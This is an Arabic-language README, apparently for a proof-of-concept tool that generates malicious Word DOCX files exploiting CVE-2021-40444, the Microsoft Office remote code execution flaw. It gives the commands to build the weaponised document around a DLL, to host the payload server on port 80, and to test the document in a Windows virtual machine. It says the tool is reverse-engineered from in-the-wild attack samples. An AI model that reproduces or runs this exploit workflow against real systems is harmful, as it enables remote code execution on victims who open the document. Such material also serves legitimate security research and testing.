
يُولّد مستندات DOCX ضارة تستغل CVE-2021-40444 (ثغرة تنفيذ الأوامر عن بُعد في Microsoft Office) مع خادم مستضاف لتسليم حمولة DLL، استنادًا إلى عينات محلّلة عكسيًا من البرية.
مولد مستندات docx خبيثة لاستغلال الثغرة CVE-2021-40444 (تنفيذ الأوامر عن بُعد في Microsoft Office Word)
تم إنشاء هذا السكريبت بناءً على بعض الهندسة العكسية للعينة المستخدمة في الهجمات الفعلية: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (ملف docx)
تحتاج إلى تثبيت lcab أولاً (sudo apt-get install lcab)
اطلع على REPRODUCE.md لخطوات إعادة الإنتاج اليدوية
إذا لم يعمل ملف cab المُنشأ، جرب توجيه رابط exploit.html إلى calc.cab
أولاً، قم بتوليد مستند docx خبيث باستخدام DLL، يمكنك استخدام الملف الموجود في test/calc.dll والذي يقوم فقط بتشغيل calc.exe عبر استدعاء system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

بعد توليد مستند docx الخبيث (سيكون في out/) يمكنك إعداد الخادم:
sudo python3 exploit.py host 80

أخيرًا، جرب المستند في جهاز افتراضي يعمل بنظام Windows:
